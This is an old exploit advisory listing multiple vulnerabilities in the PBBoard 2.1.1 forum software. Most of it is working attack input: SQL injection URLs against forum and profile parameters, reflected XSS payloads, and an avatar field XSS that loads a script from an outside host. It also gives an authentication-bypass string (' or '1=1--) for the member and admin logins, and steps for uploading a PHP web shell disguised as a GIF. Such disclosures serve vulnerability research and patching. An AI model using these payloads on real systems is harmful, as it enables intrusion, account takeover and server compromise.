PBBoard 2.1.1 SQL Injection / Cross Site Scripting / Shell Upload

Type packetstorm
Reporter jiko
Modified 2010-09-28T00:00:00


PBBoard 2.1.1 Multiple Remote Vulnerabilities  
|=-------------=[ JIKO |No-exploit.Com| ]=-----------=|  
Home :No-exploit.Com  
Mail : !x!  
name :PBBoard_v2.1.1  
link :http://www.pbboard.com/PBBoard_v2.1.1.zip  
upload Shell and file .exe ....etc :(  
select From my Pc  
and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img  
sql & xss  
all script is infected :(  
inser '( in all % variable in the script  
SQl :/index.php?page=forum&show=1&id=2'a  
Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>  
SQl :/index.php?page=profile&show=1&username=jawad'  
SQl :/index.php?page=profile&show=1&username=jawad' and id='1  
Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>  
Xss In Profil  
Url :/index.php?page=usercp&control=1&avatar=1&main=1  
Select img From Url  
http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif  
Login :(  
User : real name of admin or member you want | jawad' or '1=1--  
Pass : jiko  
for admin panel  
Url : /admin.php  
User : jawad' or '1=1--  
Pass : jiko  
:((..Etc exploit  
All my friends  
|No-Exploit.com Members